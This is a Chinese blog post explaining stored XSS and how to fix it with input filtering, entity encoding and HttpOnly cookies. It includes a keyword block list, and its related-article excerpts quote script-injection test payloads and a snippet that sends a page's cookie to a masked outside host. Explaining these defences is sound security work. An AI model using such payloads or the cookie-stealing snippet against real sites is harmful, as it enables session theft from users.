全局存储型XSS漏洞修复

最新推荐文章于 2023-07-26 15:09:45 发布
最新推荐文章于 2023-07-26 15:09:45 发布
阅读量2.5k 收藏 4
点赞数 2
分类专栏: java 文章标签: XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiangduole2044676867/article/details/103657047
版权

什么是XSS?

人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,有人将跨站脚本攻击缩写为XSS。

跨站脚本攻击(XSS),是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。

XSS能干啥?

1、盗用cookie,获取敏感信息。

2、利用植入Flash,通过crossdomain权限设置进一步获取更高权限;或者利用Java等得到类似的操作。

3、利用iframe、frame、XMLHttpRequest或上述Flash等方式,以(被攻击)用户的身份执行一些管理动作,或执行一些一般的如发微博、加好友、发私信等操作。

4、利用可被攻击的域受到其他域信任的特点,以受信任来源的身份请求一些平时不允许的操作,如进行不当的投票活动。

5、在访问量极大的一些页面上的XSS可以攻击一些小型网站,实现DDoS攻击的效果。

简单来说就是攻击者通过正常的页面或请求,将非法的参数(如:js代码、html代码)请求到后端存储在数据库中,等下次页面回显时执行非法的参数,从而达到攻击的目的。

XSS漏洞的修复

1、对用户输入的数据进行严格过滤,包括但不限于以下字符及字符串
Javascript script src href img onerror onload { } ( ) <> = , . ; :  " ' # ! / * \
2、 根据页面的输出背景环境,对输出进行编码,常见符号的实体编码如下:[较根本的解决方法]
“(双引号):&quot
’ (单引号):&apos
 &(&符号):&amp
<(左尖括号):&lt
>(右尖括号):&gt
3、 使用一个统一的规则和库做输出编码
4、 在Cookie 上设置HTTPOnly 标志,从而禁止客户端脚本访问Cookie

 

大白菜鸟
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络攻防中黑客常用的高频漏洞利用详细使用介绍以及修复方法,包括:跨站脚本XSS存储XSS、DOMXSS、flash xss、反射xss、跨站请求伪造CSRF、SQL 注入、文件包含漏洞、命令执行漏洞
代码讲故事
04-09 53
网络攻防中黑客常用的高频漏洞利用详细使用介绍以及修复方法,包括:跨站脚本XSS存储XSS、DOMXSS、flash xss、反射xss、跨站请求伪造CSRF、SQL 注入、文件包含漏洞、命令执行漏洞、SSRF 服务端请求伪造、文件上传漏洞、服务器入侵、管理后台提权等等。
解决存储Xss漏洞
abcjwg的专栏
04-15 2万+
近期做的一个项目进行渗透测试,检测代码存在存储Xss漏洞。例如在界面文本域输入<h2>12345</h2>、<script>alter(12345)</script>这样的值,如果程序未进行处理,会存储至数据库。下次回显会出现异常界面或弹出异常框,如果进行恶意攻击,可能后果不堪设想。 网上搜集的大部分代码都是使用过滤器,并对请求数据进行过滤,重写...
XSS漏洞修复方案
chitun2903的博客
08-13 3732
基本概念及解决办法 比较典XSS攻击漏洞(Cascading Style Sheets, CSS),俗称跨站脚本攻击;解决办法:将特殊字符进行转义 1、增加过滤器XssFilter.java public class XssFilter implements Filter { F...
【Java代码审计】XSS漏洞产生原理及其修复
m0_62783065的博客
05-17 4882
【Java代码审计】XSS漏洞产生原理及其修复
xss漏洞存储XSS漏洞修复
weixin_43526443的博客
05-03 5564
一、简单的测试 输入框输入<script>alert(document.cookie)</script> 得到结果,存在较为严重的存储XSS漏洞 二、代码分析      2.1 输入处理代码分析 $message=escape($link, $message); $query="insert into messa...
XSS跨站脚本安全漏洞防护
Zyw907155124的博客
06-05 1588
存储XSS是指应用程序通过Web请求获取不可信赖的数据,并且在未检验数据是否存在XSS代码的情况下,将其存入数据库。存储XSS可以持续攻击用户,在用户提交了包含XSS代码的数据存储到数据库后,每当用户在浏览网页查询对应数据库中的数据时,那些包含XSS代码的数据就会在服务器解析并加载,当浏览器读到XSS代码后,会当做正常的HTML和JS解析并执行,于是发生存储XSS攻击。如果address的值是由用户提供的,且存入数据库时没有进行合理的校验,那么攻击者就可以利用上面的代码进行存储XSS攻击。
XSS 攻击的检测和修复方法
Java徐师兄的博客
07-13 2591
XSS 攻击是一种常见和危险的 Web 攻击,开发者需要对输入数据进行过滤和转义,使用安全的编程语言和框架以及安全的数据库操作,采用 CSP 等措施来防止 XSS 攻击。同时,用户也需要注意不要轻易点击不明来源的链接,避免被诱导访问恶意网站,从而保护自己的信息安全。// 去除输入数据中的 HTML 和 PHP 标签 $data = strip_tags($data);
xss漏洞修复踩坑总结
BHSZZY的博客
05-18 3159
一、前言 最近测试发现系统某个接口有个xss漏洞,比如,保存数据入库时,会把<a>标签保存入库;然后查看列表时,会把<a>标签显示出来; 说是这个漏洞可以构建恶意链接,点击会跳转到恶意网址,让修复掉。 二、修复方法:前端修复 这个问题之前也遇到过,于是就按照之前的修复方法,让前端加一个xss.js,过滤掉不合法的标签后,再把数据传给后台。 谁知道这次不行了,测试直接抓包,用postman直接给后台发送含有<a>标签的请求,结果又存入数据库了。 如果从前端输入含有<a
YXcms-含有存储XSS漏洞的源码包
03-17
YXcms-含有存储XSS漏洞的源码包,亲测真实有效可用,如有侵权,请联系CSDN管理员删除即可
DedeCMS 存储xss漏洞1
08-03
Dedecms会员功能shops_delivery.php中的 des 参数存在存储XSS漏洞,攻击者可利用漏洞获得用户测试环境:DedeCMS-V5.7-U
ourphp存储xss漏洞1
08-03
漏洞简介:OurPHP(傲派建站系统)是一款使用PHP语言开发的网站内容管理系统,开发商为哈尔滨伟成科技有限公司。OurPHP 1.7.3版本存在存储xss
SQL+XSS漏洞修复方案
04-13
近期公司的项目遭受了SQL+XSS攻击(市面上现在检测工具很多如:AWVS/360等),现贴出项目中的修复核心代码,需要的可以参考一下
YXcms-含有存储XSS漏洞的源码包(1).zip
12-31
YXcms-含有存储XSS漏洞的源码包,亲测真实有效,可用,如有侵权,请联系CSDN管理员删除即可
typecho存储xss漏洞复现
最新发布
m0_73299839的博客
07-26 332
之前搭博客的时候使用的是typecho,然后有看到文章说typecho
网络安全XSS跨站脚本攻击漏洞和不安全HTTP方法的修补
Funky_oaNiu的博客
12-23 1788
一、项目背景 一个Springboot+MyBatis+Redis+MySQL的辣鸡小项目。奈何再小的项目也需要保证安全,今天提交给测试部门做渗透测试,打回来两个网络安全漏洞,网上有很多“模糊”的修改办法,我们来看看具体怎么修补吧。 二、漏洞描述 1.不安全的HTTP方法 不安全的HTTP方法一般包括:TRACE、PUT、DELETE、COPY 等。其中最常见的为TRACE方法可以回显服务器收到的请求,主要用于测试或诊断,恶意攻击者可以利用该方法进行跨站跟踪攻击(即XST攻击),从而进行网站钓鱼、盗取管理员
XSS攻击及防御
热门推荐
寻道
11-29 20万+
本文来自:高爽|Coder,原文地址:http://blog.csdn.net/ghsau/article/details/17027893,转载请注明。 XSS又称CSS,全称Cross SiteScript,跨站脚本攻击,是Web程序中常见的漏洞XSS属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性。其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的H...
XSS漏洞原理与防护措施
qq_50905066的博客
03-27 9321
xss漏洞,既跨站脚本攻击 xss分类: 大致可以分为储存与反射。 储存:最直接的危害类,跨站代码存储在服务器(数据库)。 反射:反射跨站脚本漏洞,最普遍的类。用户访问服务器-跨站链接-返回跨站代码。 如图 图中所示位储存xss攻击流程。攻击者要先搭建起恶意服务器。构建xss恶意脚本,通过留言,评论,注册等各种正常服务器可以上传的位置上传恶意脚本。 服务器会将恶意脚本保存在数据库中,当正常用户访问服务器并查看了该恶意脚本时,服务器会将xss的恶意脚本返回至用户浏览器。 这时用
利用HttpOnly来防御xss攻击
NiceGY
05-18 3019
xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的网站出现xss漏洞,就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,如果这里面包含了大量敏感信息(身份信息,管理员信息)等,那完了。。。 如下js获取cookie信息:  url=document.top.location.href;  cookie=document.cookie;  c=new Image();  c.src=’http://www.******.c
java xss漏洞修复_全局存储XSS漏洞修复
weixin_39916520的博客
02-24 2034
什么是XSS?人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,有人将跨站脚本攻击缩写为XSS。跨站脚本攻击(XSS),是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而...
反射xss漏洞修复建议
07-12
对于反射XSS漏洞修复,以下是一些建议: 1. 输入验证和过滤:对用户输入的数据进行验证和过滤,移除或转义特殊字符,确保用户输入不包含恶意的脚本代码。 2. 输出编码:在将用户输入的数据输出到网页上时,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值